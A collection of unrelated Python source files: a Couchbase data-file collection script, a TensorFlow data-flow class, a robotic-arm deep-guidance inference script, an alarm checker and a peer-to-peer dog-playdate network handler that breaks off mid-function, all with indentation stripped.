import getopt
import sys
import os
import time
from threading import Thread
from datetime import datetime
sys.path.extend(('.', 'lib'))
from lib.remote.remote_util import RemoteMachineShellConnection
from lib.membase.api.rest_client import RestConnection
import TestInput
def usage(error=None):
print """\
Syntax: collect_data_files.py [options]
Options
-i <file> Path to .ini file containing cluster information.
-p <key=val,...> Comma-separated key=value info.
Available keys:
path=<file_path> The destination path you want to put your zipped diag file
Example:
collect_data_files.py -i cluster.ini -p path=/tmp/nosql
"""
sys.exit(error)
class cbdatacollectRunner(object):
def __init__(self, server, path):
self.server = server
self.path = path
def __get_data_path(self, os_type):
data_path = None
node_info = RestConnection(self.server).get_nodes_self()
for storage in node_info.storage:
if storage.type == 'hdd':
data_path = storage.path
break
if os_type == 'windows':
# Windows server will return the path as c:/Program Files/Couchbase/Server/var/lib/couchbase/data
data_path = "/cygdrive/c{0}".format(data_path[data_path.find("/"):])
return data_path
def run(self):
remote_client = RemoteMachineShellConnection(self.server)
now = datetime.now()
day = now.day
month = now.month
year = now.year
hour = now.timetuple().tm_hour
minute = now.timetuple().tm_min
file_name = "%s-%s%s%s-%s%s-couch.tar.gz" % (self.server.ip,
month, day, year, hour,
minute)
print "Collecting data files from %s\n" % self.server.ip
remote_client.extract_remote_info()
data_path = self.__get_data_path(os_type=remote_client.info.type.lower())
output, error = remote_client.execute_command("tar -zcvf {0} '{1}' >/dev/null 2>&1".
format(file_name, data_path))
print "\n".join(output)
print "\n".join(error)
user_path = "/home/"
if self.server.ssh_username == "root":
user_path = "/"
remote_path = "%s%s" % (user_path, self.server.ssh_username)
status = remote_client.file_exists(remote_path, file_name)
if not status:
raise Exception("%s doesn't exists on server" % file_name)
status = remote_client.get_file(remote_path, file_name,
"%s/%s" % (self.path, file_name))
if not status:
raise Exception("Fail to download zipped logs from %s"
% self.server.ip)
remote_client.execute_command("rm -f %s" % os.path.join(remote_path, file_name))
remote_client.disconnect()
def main():
try:
(opts, _) = getopt.getopt(sys.argv[1:], 'hi:p', [])
for o, _ in opts:
if o == "-h":
usage()
_input = TestInput.TestInputParser.get_test_input(sys.argv)
if not _input.servers:
usage("ERROR: no servers specified. Please use the -i parameter.")
except IndexError:
usage()
except getopt.GetoptError, error:
usage("ERROR: " + str(error))
file_path = _input.param("path", ".")
remotes = (cbdatacollectRunner(server, file_path) for server in _input.servers)
remote_threads = [Thread(target=remote.run) for remote in remotes]
for remote_thread in remote_threads:
remote_thread.daemon = True
remote_thread.start()
run_time = 0
while remote_thread.isAlive() and run_time < 1200:
time.sleep(15)
run_time += 15
print "Waiting for another 15 seconds (time-out after 20 min)"
if run_time == 1200:
print "collect_data_files hung on this node. Jumping to next node"
print "collect data files done"
for remote_thread in remote_threads:
remote_thread.join(120)
if remote_thread.isAlive():
raise Exception("collect_data_files hung on remote node")
if __name__ == "__main__":
main()
|
data_flow.py
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
import threading
try:
# Python 2
import Queue as queue
except Exception:
# Python 3
import queue
from . import utils
class DataFlow(object):
""" Data Flow.
Base class for using real time pre-processing and controlling data flow.
Supports pipelining for faster computation.
Arguments:
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
shuffle: `bool`. If True, data will be shuffle.
continuous: `bool`. If True, when an epoch is over, same data will be
feeded again.
ensure_data_order: `bool`. Ensure that data order is keeped when using
'next' to retrieve data (Processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
daug_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
"""
def __init__(self, coord, num_threads=8, max_queue=32, shuffle=False,
continuous=False, ensure_data_order=False,
dprep_dict=None, daug_dict=None):
self.coord = coord
self.num_threads = num_threads
self.max_queue = max_queue
self.shuffle = shuffle
self.continuous = continuous
if ensure_data_order:
self.num_threads = 1
self.max_queue = 1
self.dprep_dict = dprep_dict
self.daug_dict = daug_dict
self.interrupted = False
class FeedDictFlow(DataFlow):
""" FeedDictFlow.
Generate a stream of batches from a dataset. It uses two queues, one for
generating batch of data ids, and the other one to load data and apply pre
processing. If continuous is `True`, data flow will never ends until `stop`
is invoked, or `coord` interrupt threads.
Arguments:
feed_dict: `dict`. A TensorFlow formatted feed dict (with placeholders
as keys and data as values).
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
shuffle: `bool`. If True, data will be shuffle.
continuous: `bool`. If True, when an epoch is over, same data will be
feeded again.
ensure_data_order: `bool`. Ensure that data order is keeped when using
'next' to retrieve data (Processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
daug_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
index_array: `list`. An optional list of index to be used instead of
using the whole dataset indexes (Useful for validation split).
"""
def __init__(self, feed_dict, coord, batch_size=128, num_threads=8,
max_queue=32, shuffle=False, continuous=False,
ensure_data_order=False, dprep_dict=None, daug_dict=None,
index_array=None):
super(FeedDictFlow, self).__init__(coord, num_threads, max_queue,
shuffle, continuous,
ensure_data_order,
dprep_dict,
daug_dict)
self.feed_dict = feed_dict
self.batch_size = batch_size
self.n_samples = len(utils.get_dict_first_element(feed_dict))
# Queue holding batch ids
self.batch_ids_queue = queue.Queue(self.max_queue)
# Queue holding data ready feed dicts
self.feed_dict_queue = queue.Queue(self.max_queue)
# Create samples index array
self.index_array = np.arange(self.n_samples)
if index_array is not None:
self.index_array = index_array
self.n_samples = len(index_array)
# Create batches
self.batches = self.make_batches()
self.reset_batches()
# Data Recording
self.data_status = DataFlowStatus(self.batch_size, self.n_samples)
def next(self, timeout=None):
""" next.
Get the next feed dict.
Returns:
A TensorFlow feed dict, or 'False' if it has no more data.
"""
self.data_status.update()
return self.feed_dict_queue.get(timeout=timeout)
def start(self, reset_status=True):
""" start.
Arguments:
reset_status: `bool`. If True, `DataStatus` will be reset.
Returns:
"""
# Start to process data and fill queues
self.clear_queues()
self.interrupted = False
# Reset Data Status
if reset_status:
self.data_status.reset()
# Only a single thread needed for batches ids
bi_threads = [threading.Thread(target=self.fill_batch_ids_queue)]
# Multiple threads available for feed batch pre-processing
fd_threads = [threading.Thread(target=self.fill_feed_dict_queue)
for i in range(self.num_threads)]
self.threads = bi_threads + fd_threads
for t in self.threads:
t.start()
def stop(self):
""" stop.
Stop the queue from creating more feed_dict.
"""
# Send stop signal to processing queue
for i in range(self.num_threads):
self.batch_ids_queue.put(False)
# Launch a Thread to wait for processing scripts to finish
threading.Thread(target=self.wait_for_threads).start()
def reset(self):
""" reset.
Reset batch index.
"""
self.batch_index = -1
def interrupt(self):
# Send interruption signal to processing queue
self.interrupted = True
self.clear_queues()
def fill_feed_dict_queue(self):
while not self.coord.should_stop() and not self.interrupted:
batch_ids = self.batch_ids_queue.get()
if batch_ids is False:
break
data = self.retrieve_data(batch_ids)
# Apply augmentation according to daug dict
if self.daug_dict:
for k in self.daug_dict:
data[k] = self.daug_dict[k].apply(data[k])
# Apply preprocessing according to dprep dict
if self.dprep_dict:
for k in self.dprep_dict:
data[k] = self.dprep_dict[k].apply(data[k])
#all prepped, put the data into the queue
self.feed_dict_queue.put(data)
def fill_batch_ids_queue(self):
while not self.coord.should_stop() and not self.interrupted:
ids = self.next_batch_ids()
if ids is False:
break
self.batch_ids_queue.put(ids)
def next_batch_ids(self):
self.batch_index += 1
if self.batch_index == len(self.batches):
if not self.continuous:
self.stop()
return False
self.reset_batches()
batch_start, batch_end = self.batches[self.batch_index]
return self.index_array[batch_start:batch_end]
def retrieve_data(self, batch_ids):
feed_batch = {}
for key in self.feed_dict:
feed_batch[key] = \
utils.slice_array(self.feed_dict[key], batch_ids)
return feed_batch
def reset_batches(self):
if self.shuffle:
self.shuffle_samples()
# Generate new batches
self.batches = self.make_batches()
self.batch_index = -1
def make_batches(self):
return utils.make_batches(self.n_samples, self.batch_size)
def shuffle_samples(self):
np.random.shuffle(self.index_array)
def wait_for_threads(self):
# Wait for threads to finish computation (max 120s)
self.coord.join(self.threads)
# Send end signal to indicate no more data in feed queue
self.feed_dict_queue.put(False)
def clear_queues(self):
""" clear_queues.
Clear queues.
"""
while not self.feed_dict_queue.empty():
self.feed_dict_queue.get()
while not self.batch_ids_queue.empty():
self.batch_ids_queue.get()
class TFRecordsFlow(DataFlow):
def __init__(self, coord):
super(TFRecordsFlow, self).__init__(coord)
raise NotImplementedError
class DataFlowStatus(object):
""" Data Flow Status
Simple class for recording how many data have been processed.
"""
def __init__(self, batch_size, n_samples):
self.step = 0
self.epoch = 0
self.current_iter = 0
self.batch_size = batch_size
self.n_samples = n_samples
def update(self):
self.step += 1
self.current_iter = min(self.step * self.batch_size, self.n_samples)
if self.current_iter == self.n_samples:
self.epoch += 1
self.step = 0
def reset(self):
self.step = 0
self.epoch = 0
|
use_deep_guidance_arm.py
|
"""
This script loads in a trained policy neural network and uses it for inference.
Typically this script will be executed on the Nvidia Jetson TX2 board during an
experiment in the Spacecraft Robotics and Control Laboratory at Carleton
University.
Script created: June 12, 2019
@author: Kirk (khovell@gmail.com)
"""
import tensorflow as tf
import numpy as np
import socket
import time
import threading
from collections import deque
# import code # for debugging
#code.interact(local=dict(globals(), **locals())) # Ctrl+D or Ctrl+Z to continue execution
try:
from settings import Settings
except:
print("You must load the 'manipulator' environment in settings\n\nQuitting.")
raise SystemExit
from build_neural_networks import BuildActorNetwork
assert Settings.ENVIRONMENT == 'manipulator'
# Load an environment to use methods from
environment_file = __import__('environment_' + Settings.ENVIRONMENT) # importing the environment
"""
*# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #*
Deep guidance output in x and y are in the chaser body frame
"""
# Are we testing?
testing = False
CHECK_VELOCITY_LIMITS_IN_PYTHON = True
HARD_CODE_TARGET_SPIN_TO_ZERO = True
###############################
### User-defined parameters ###
###############################
offset_x = 0.0 # Position offset of the target in its body frame
offset_y = 0.0 # Position offset of the target in its body frame
offset_angle = 0 # Angle offset of the target in its body frame
# Do you want to debug with constant accelerations?
DEBUG_CONTROLLER_WITH_CONSTANT_ACCELERATIONS = False
constant_Ax = 0 # [m/s^2] in inertial frame
constant_Ay = 0 # [m/s^2] in inertial frame
constant_alpha = 0 # [rad/s^2] in inertial frame
constant_alpha_shoulder = 0 # [rad/s^2]
constant_alpha_elbow = 0# [rad/s^2]
constant_alpha_wrist = 0# [rad/s^2]
def make_C_bI(angle):
C_bI = np.array([[ np.cos(angle), np.sin(angle)],
[-np.sin(angle), np.cos(angle)]]) # [2, 2]
return C_bI
class MessageParser:
def __init__(self, testing, client_socket, messages_to_deep_guidance, stop_run_flag):
print("Initializing Message Parser!")
self.client_socket = client_socket
self.messages_to_deep_guidance = messages_to_deep_guidance
self.stop_run_flag = stop_run_flag
self.testing = testing
# Items from the Pi
self.Pi_time = 0
self.Pi_red_x = 0
self.Pi_red_y = 0
self.Pi_red_theta = 0
self.Pi_red_Vx = 0
self.Pi_red_Vy = 0
self.Pi_red_omega = 0
self.Pi_black_x = 0
self.Pi_black_y = 0
self.Pi_black_theta = 0
self.Pi_black_Vx = 0
self.Pi_black_Vy = 0
self.Pi_black_omega = 0
self.shoulder_theta = 0
self.elbow_theta = 0
self.wrist_theta = 0
self.shoulder_omega = 0
self.elbow_omega = 0
self.wrist_omega = 0
print("Done initializing parser!")
def run(self):
print("Running Message Parser!")
# Run until we want to stop
while not self.stop_run_flag.is_set():
if self.testing:
# Assign test values
# Items from the Pi
self.Pi_time = 15
self.Pi_red_x = 3
self.Pi_red_y = 1
self.Pi_red_theta = 0.5
self.Pi_red_Vx = 0
self.Pi_red_Vy = 0
self.Pi_red_omega = 0
self.Pi_black_x = 1
self.Pi_black_y = 1
self.Pi_black_theta = 3.1
self.Pi_black_Vx = 0
self.Pi_black_Vy = 0
self.Pi_black_omega = 0
self.shoulder_theta = 1
self.elbow_theta = 1.2
self.wrist_theta = 0.5
self.shoulder_omega = 0
self.elbow_omega = 0
self.wrist_omega = 0
else:
# It's real
try:
data = self.client_socket.recv(4096) # Read the next value
except socket.timeout:
print("Socket timeout")
continue
data_packet = np.array(data.decode("utf-8").splitlines())
#print('Got message: ' + str(data.decode("utf-8")))
# We received a packet from the Pi
# input_data_array is: [time, red_x, red_y, red_angle, red_vx, red_vy, red_dangle, black_x, black_y, black_angle, black_vx, black_vy, black_dangle, shoulder_angle, elbow_angle, wrist_angle, shoulder_omega, elbow_omega, wrist_omega]
self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega = data_packet.astype(np.float32)
if HARD_CODE_TARGET_SPIN_TO_ZERO:
self.Pi_black_omega = 0.0
# Apply the offsets to the target
offsets_target_body = np.array([offset_x, offset_y])
offsets_target_inertial = np.matmul(make_C_bI(self.Pi_black_theta).T, offsets_target_body)
self.Pi_black_x = self.Pi_black_x - offsets_target_inertial[0]
self.Pi_black_y = self.Pi_black_y - offsets_target_inertial[1]
self.Pi_black_theta = self.Pi_black_theta - offset_angle
print("Pi Packet! Time: %.1f, Wrist angle: %.1f deg" %(self.Pi_time, self.wrist_theta*180/np.pi))
# Write the data to the queue for DeepGuidanceModelRunner to use!
""" This queue is thread-safe. If I append multiple times without popping, the data in the queue is overwritten. Perfect! """
#(self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega)
self.messages_to_deep_guidance.append((self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega))
print("Message handler gently stopped")
class DeepGuidanceModelRunner:
def __init__(self, testing, client_socket, messages_to_deep_guidance, stop_run_flag):
print("Initializing deep guidance model runner")
self.client_socket = client_socket
self.messages_to_deep_guidance = messages_to_deep_guidance
self.stop_run_flag = stop_run_flag
self.testing = testing
# Initializing a variable to check if we've docked
self.have_we_docked = 0.
# Holding the previous position so we know when SPOTNet gives a new update
self.previousSPOTNet_relative_x = 0.0
# Initialize an environment so we can use its methods
self.environment = environment_file.Environment()
self.environment.reset(False)
# Uncomment this on TF2.0
#tf.compat.v1.disable_eager_execution()
# Clear any old graph
tf.reset_default_graph()
# Initialize Tensorflow, and load in policy
self.sess = tf.Session()
# Building the policy network
self.state_placeholder = tf.placeholder(dtype = tf.float32, shape = [None, Settings.OBSERVATION_SIZE], name = "state_placeholder")
self.actor = BuildActorNetwork(self.state_placeholder, scope='learner_actor_main')
# Loading in trained network weights
print("Attempting to load in previously-trained model\n")
saver = tf.train.Saver() # initialize the tensorflow Saver()
# Try to load in policy network parameters
try:
ckpt = tf.train.get_checkpoint_state('../')
saver.restore(self.sess, ckpt.model_checkpoint_path)
print("\nModel successfully loaded!\n")
except (ValueError, AttributeError):
print("Model: ", ckpt.model_checkpoint_path, " not found... :(")
raise SystemExit
print("Done initializing model!")
def run(self):
print("Running Deep Guidance!")
counter = 1
# Parameters for normalizing the input
relevant_state_mean = np.delete(Settings.STATE_MEAN, Settings.IRRELEVANT_STATES)
relevant_half_range = np.delete(Settings.STATE_HALF_RANGE, Settings.IRRELEVANT_STATES)
# To log data
data_log = []
# Run zeros through the policy to ensure all libraries are properly loaded in
deep_guidance = self.sess.run(self.actor.action_scaled, feed_dict={self.state_placeholder:np.zeros([1, Settings.OBSERVATION_SIZE])})[0]
# Run until we want to stop
while not stop_run_flag.is_set():
# Total state is [relative_x, relative_y, relative_vx, relative_vy, relative_angle, relative_angular_velocity, chaser_x, chaser_y, chaser_theta, target_x, target_y, target_theta, chaser_vx, chaser_vy, chaser_omega, target_vx, target_vy, target_omega] *# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #*
# Network input: [relative_x, relative_y, relative_angle, chaser_theta, chaser_vx, chaser_vy, chaser_omega, target_omega] ** Normalize it first **
# Get data from Message Parser
try:
Pi_time, Pi_red_x, Pi_red_y, Pi_red_theta, \
Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \
Pi_black_x, Pi_black_y, Pi_black_theta, \
Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \
shoulder_theta, elbow_theta, wrist_theta, \
shoulder_omega, elbow_omega, wrist_omega = self.messages_to_deep_guidance.pop()
except IndexError:
# Queue was empty, try agian
continue
#############################
### Check if we've docked ###
#############################
# Check the reward function based off this state
self.environment.chaser_position = np.array([Pi_red_x, Pi_red_y, Pi_red_theta])
self.environment.chaser_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega])
self.environment.target_position = np.array([Pi_black_x, Pi_black_y, Pi_black_theta])
self.environment.target_velocity = np.array([Pi_black_Vx, Pi_black_Vy, Pi_black_omega])
self.environment.arm_angles = np.array([shoulder_theta, elbow_theta, wrist_theta])
self.environment.arm_angular_rates = np.array([shoulder_omega, elbow_omega, wrist_omega])
# Get environment to check for collisions
self.environment.update_end_effector_and_docking_locations()
self.environment.update_end_effector_location_body_frame()
self.environment.update_relative_pose_body_frame()
self.environment.check_collisions()
# Ask the environment whether docking occurred
self.have_we_docked = np.max([self.have_we_docked, float(self.environment.docked)])
# Extracting end-effector position and docking port position in the Inertial frame
end_effector_position = self.environment.end_effector_position
docking_port_position = self.environment.docking_port_position
# Calculating relative position between the docking port and the end-effector in the Target's body frame
docking_error_inertial = end_effector_position - docking_port_position
docking_error_target_body = np.matmul(make_C_bI(Pi_black_theta), docking_error_inertial)
print("Distance from cone to end-effector in target body frame: ", docking_error_target_body, " Environment thinks we've docked: ", self.have_we_docked, " with offsets: ", offset_x, offset_y, offset_angle)
#################################
### Building the Policy Input ###
#################################
total_state = self.environment.make_total_state()
policy_input = np.delete(total_state, Settings.IRRELEVANT_STATES)
# Normalizing
if Settings.NORMALIZE_STATE:
normalized_policy_input = (policy_input - relevant_state_mean)/relevant_half_range
else:
normalized_policy_input = policy_input
# Reshaping the input
normalized_policy_input = normalized_policy_input.reshape([-1, Settings.OBSERVATION_SIZE])
# Run processed state through the policy
deep_guidance = self.sess.run(self.actor.action_scaled, feed_dict={self.state_placeholder:normalized_policy_input})[0] # [accel_x, accel_y, alpha]
# Rotating the command into the inertial frame
if not Settings.ACTIONS_IN_INERTIAL:
deep_guidance[0:2] = np.matmul(make_C_bI(Pi_red_theta).T,deep_guidance[0:2])
# Commanding constant values in the inertial frame for testing purposes
if DEBUG_CONTROLLER_WITH_CONSTANT_ACCELERATIONS:
deep_guidance[0] = constant_Ax # [m/s^2]
deep_guidance[1] = constant_Ay # [m/s^2]
deep_guidance[2] = constant_alpha # [rad/s^2]
deep_guidance[3] = constant_alpha_shoulder # [rad/s^2]
deep_guidance[4] = constant_alpha_elbow # [rad/s^2]]
deep_guidance[5] = constant_alpha_wrist # [rad/s^2]
#################################################################
### Cap output if we are exceeding the max allowable velocity ###
#################################################################
# Stopping the command of additional velocity when we are already at our maximum
""" The check for arm velocity exceeding has been transferred to Simulink - June 1, 2021 """
if CHECK_VELOCITY_LIMITS_IN_PYTHON:
current_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega])
deep_guidance[:len(current_velocity)][(np.abs(current_velocity) > Settings.VELOCITY_LIMIT[:len(current_velocity)]) & (np.sign(deep_guidance[:len(current_velocity)]) == np.sign(current_velocity))] = 0
# Return commanded action to the Raspberry Pi 3
if self.testing:
print(deep_guidance)
else:
deep_guidance_acceleration_signal_to_pi = str(deep_guidance[0]) + "\n" + str(deep_guidance[1]) + "\n" + str(deep_guidance[2]) + "\n" + str(deep_guidance[3]) + "\n" + str(deep_guidance[4]) + "\n" + str(deep_guidance[5]) + "\n" + str(self.have_we_docked) + "\n"
self.client_socket.send(deep_guidance_acceleration_signal_to_pi.encode())
if counter % 2000 == 0:
print("Output to Pi: ", deep_guidance, " In table inertial frame or joint frame")
print(normalized_policy_input)
# Incrementing the counter
counter = counter + 1
# Log this timestep's data only if the experiment has actually started
if Pi_time > 0:
data_log.append([Pi_time, deep_guidance[0], deep_guidance[1], deep_guidance[2], \
deep_guidance[3], deep_guidance[4], deep_guidance[5], \
Pi_red_x, Pi_red_y, Pi_red_theta, \
Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \
Pi_black_x, Pi_black_y, Pi_black_theta, \
Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \
shoulder_theta, elbow_theta, wrist_theta, \
shoulder_omega, elbow_omega, wrist_omega, self.have_we_docked])
print("Model gently stopped.")
if len(data_log) > 0:
print("Saving data to file...",end='')
with open('deep_guidance_data_' + time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.txt', 'wb') as f:
np.save(f, np.asarray(data_log))
else:
print("Not saving a log because there is no data to write")
print("Done!")
# Close tensorflow session
self.sess.close()
##################################################
#### Start communication with JetsonRepeater #####
##################################################
if testing:
client_socket = 0
else:
# Looping forever until we are connected
while True:
try: # Try to connect
client_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_socket.connect("/tmp/jetsonRepeater") # Connecting...
client_socket.settimeout(2) # Setting the socket timeout to 2 seconds
print("Connected to JetsonRepeater!")
break
except: # If connection attempt failed
print("Connection to JetsonRepeater FAILED. Trying to re-connect in 1 second")
time.sleep(1)
# WE ARE CONNECTED
# Generate Queues
messages_to_deep_guidance = deque(maxlen = 1)
#####################
### START THREADS ###
#####################
all_threads = []
stop_run_flag = threading.Event() # Flag to stop all threads
# Initialize Message Parser
message_parser = MessageParser(testing, client_socket, messages_to_deep_guidance, stop_run_flag)
# Initialize Deep Guidance Model
deep_guidance_model = DeepGuidanceModelRunner(testing, client_socket, messages_to_deep_guidance, stop_run_flag)
all_threads.append(threading.Thread(target = message_parser.run))
all_threads.append(threading.Thread(target = deep_guidance_model.run))
#############################################
##### STARTING EXECUTION OF ALL THREADS #####
#############################################
# #
# #
for each_thread in all_threads: #
# #
each_thread.start() #
# #
# #
#############################################
############## THREADS STARTED ##############
#############################################
counter_2 = 1
try:
while True:
time.sleep(0.5)
if counter_2 % 200 == 0:
print("100 seconds in, trying to stop gracefully")
stop_run_flag.set()
for each_thread in all_threads:
each_thread.join()
break
except KeyboardInterrupt:
print("Interrupted by user. Ending gently")
stop_run_flag.set()
for each_thread in all_threads:
each_thread.join()
print('Done :)')
|
AlarmCheck.py
|
import threading
import time
import AlarmStorage
# import LedController
class AlarmCheck(object):
""" Threading example class
The run() method will be started and it will run in the background
until the application exits.
"""
def __init__(self, interval=30):
""" Constructor
:type interval: int
:param interval: Check interval, in seconds
"""
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
print("alarm check started at: " + time.strftime('%X %x %Z'))
alarmflag = 99999
while True:
""" if alarm is updated, make sure we check for new ones """
alarms = AlarmStorage.ReturnAlarmsInJson()
alarmtime = ((time.localtime().tm_hour * 60) + time.localtime().tm_min)
dayindex = time.localtime().tm_wday
# fix day index to match indexing
if dayindex == 6:
dayindex = 0
else:
dayindex += 1
# print("alarmflag "+str(alarmflag)+" alarmtime "+str(alarmtime) +" != "+ str(alarmflag != alarmtime))
# see if have an alarm at this time, and that we haven't alerted for it already for today
if str(alarmtime) in alarms.keys() and alarmflag != alarmtime+dayindex:
# make sure the alarm is active and make sure it should be alerted today.
if alarms[str(alarmtime)]['isActive'] == u'1' and alarms[str(alarmtime)]['days'][dayindex] == 1:
# alarm time plus the day index makes sure the triggering is only for a specific day and time.
alarmflag = alarmtime+dayindex
print("trigger alarm: " + str(alarmtime))
# LedController.slow_illumination()
time.sleep(self.interval)
|
puppyplaydate.py
|
# This performs the under-the-hood logic for puppyplaydate using btpeer
from btpeer import *
import json
# PuppyPlaydate message types
GETPEERS="GPER"
GETREPL="GREP"
ADDFRIEND = "ADDF"
MEET = "MEET"
MEETREPLY = "MREP"
QUERY = "QUER"
QRESP = "QRES"
# Underlying required message types
INFO = "INFO"
LISTPEERS = "LIST"
QUIT = "QUIT"
REPLY="REPL"
ERROR="ERRO"
class PuppyPlaydate(BTPeer):
def __init__(self, maxpeers, serverport):
BTPeer.__init__(self, maxpeers, serverport)
self.meetups = {} # Requested and Sent meetup information
self.dogs = {} # Known dogs in format of { peerid: [{owner, name, age, breed}, ...]}
self.addrouter(self.__router)
handlers = {LISTPEERS : self.handle_listpeers,
GETPEERS: self.handle_getpeers,
GETREPL : self.handle_getpeers_reply,
ADDFRIEND : self.handle_insertpeer,
INFO: self.handle_peername,
MEET: self.handle_meet,
MEETREPLY: self.handle_meet_reply,
QRESP: self.handle_qresponse,
QUERY: self.handle_query,
QUIT: self.handle_quit
}
for mt in handlers:
self.addhandler(mt, handlers[mt])
def handle_quit(self, peerconn, data):
"""
Handles a peer trying to disconnect from a target node's network,
aka 'unfriending' them.
"""
self.peerlock.acquire()
try:
peerid = data.lstrip().rstrip()
if peerid in self.getpeerids():
msg = 'Quit: peer removed: %s' % peerid
self.__debug(msg)
peerconn.senddata(REPLY, msg)
self.removepeer(peerid)
else:
msg = 'Quit: peer not found: %s' % peerid
self.__debug(msg)
peerconn.senddata(ERROR, msg)
finally:
self.peerlock.release()
def handle_listpeers(self, peerconn, data):
""" Handles the LISTPEERS message type. Message data is not used.
"""
self.peerlock.acquire()
try:
self.__debug('Listing peers %d' % self.numberofpeers())
peerconn.senddata(REPLY, '%d' % self.numberofpeers())
for pid in self.getpeerids():
host,port = self.getpeer(pid)
peerconn.senddata(REPLY, '%s %s %d' % (pid, host, port))
finally:
self.peerlock.release()
def handle_getpeers(self, peerconn, data):
"""
Lists all of a target node's known peers
"""
self.peerlock.acquire()
try:
print "Sending back", self.getpeerids()
host, port = data.split(':')
self.connectandsend(host, port, GETREPL, json.dumps(self.getpeerids()))
finally:
self.peerlock.release()
def handle_getpeers_reply(self, peerconn, data):
"""
Handles GREP message - adds all the peers returned from the target
node to its own peerlist
"""
self.peerlock.acquire()
try:
try:
peerList = json.loads(data) #[host:port, host:port]
if self.maxpeersreached():
self.__debug('maxpeers %d reached: connection terminating'
% self.maxpeers)
peerconn.senddata(ERROR, 'Join: too many peers')
return
# peerid = '%s:%s' % (host,port)
for peerid in peerList:
print peerid
if peerid not in self.getpeerids() and peerid != self.myid:
host,port = peerid.split(':')
self.addpeer(peerid, host, port)
print'added peer:' +peerid
peerconn.senddata(REPLY, 'Join: peer added: %s' % peerid)
else:
peerconn.senddata(ERROR, 'Join: peer already inserted %s'
% peerid)
except:
self.__debug('invalid insert %s: %s' % (str(peerconn), data))
peerconn.senddata(ERROR, 'Join: incorrect arguments')
finally:
self.peerlock.release()
def handle_insertpeer(self, peerconn, data):
"""
Handles inserting a peer into node's known peers list
"""
self.peerlock.acquire()
try:
try:
peerid,host,port = data.split()
if self.maxpeersreached():
self.__debug('maxpeers %d reached: connection terminating'
% self.maxpeers)
peerconn.senddata(ERROR, 'Join: too many peers')
return
# peerid = '%s:%s' % (host,port)
if peerid not in self.getpeerids() and peerid != self.myid:
self.addpeer(peerid, host, port)
print'added peer:' +peerid
peerconn.senddata(REPLY, 'Join: peer added: %s' % peerid)
else:
peerconn.senddata(ERROR, 'Join: peer already inserted %s'
% peerid)
except:
self.__debug('invalid insert %s: %s' % (str(peerconn), data))
peerconn.senddata(ERROR, 'Join: incorrect arguments')
finally:
self.peerlock.release()
def handle_peername(self, peerconn, data):
peerconn.senddata(REPLY, self.myid)
def buildpeers(self, host, port, hops):
"""
Will add first-level peers to known peers list (NON-RECURSIVE)
"""
if self.maxpeersreached() or not hops:
return
peerid = None
self.__debug("Building peers from (%s,%s)" % (host,port))
try:
_, peerid = self.connectandsend(host, port, INFO, '')[0]
self.__debug("contacted " + peerid)
resp = self.connectandsend(host, port, ADDFRIEND,
'%s %s %d' % (self.myid,
self.serverhost,
self.serverport))[0]
self.__debug(str(resp))
if (resp[0] != REPLY) or (peerid in self.getpeerids()):
return
self.addpeer(peerid, host, port)
#
# # do recursive depth first search to add more peers
# resp = self.connectandsend(host, port, LISTPEERS, '',
# pid=peerid)
# if len(resp) > 1:
# resp.reverse()
# resp.pop() # get rid of header count reply
# while len(resp):
# nextpid,host,port = resp.pop()[1].split()
# if nextpid != self.myid:
# self.buildpeers(host, port, hops - 1)
except:
if self.debug:
traceback.print_exc()
self.removepeer(peerid)
def addlocaldog(self, data):
"""
Adds new dog info, should be following structure:
owner name breed age
"""
owner, name, breed, age = data.split()
try:
self.dogs[self.myid].append({'owner': owner, 'name': name, 'breed': breed, 'age': age})
except:
self.dogs[self.myid] = []
self.dogs[self.myid].append({'owner': owner, 'name': name, 'breed': breed, 'age': age})
def handle_query(self, peerconn, data):
"""
This handles the QUERY message type
and will check if their dog matches the sent data,
else will propagate the message to immediate neighbors.
Data should be in following format:
returnPID owner name breed age OR
owner OR
ret_pid
"""
try:
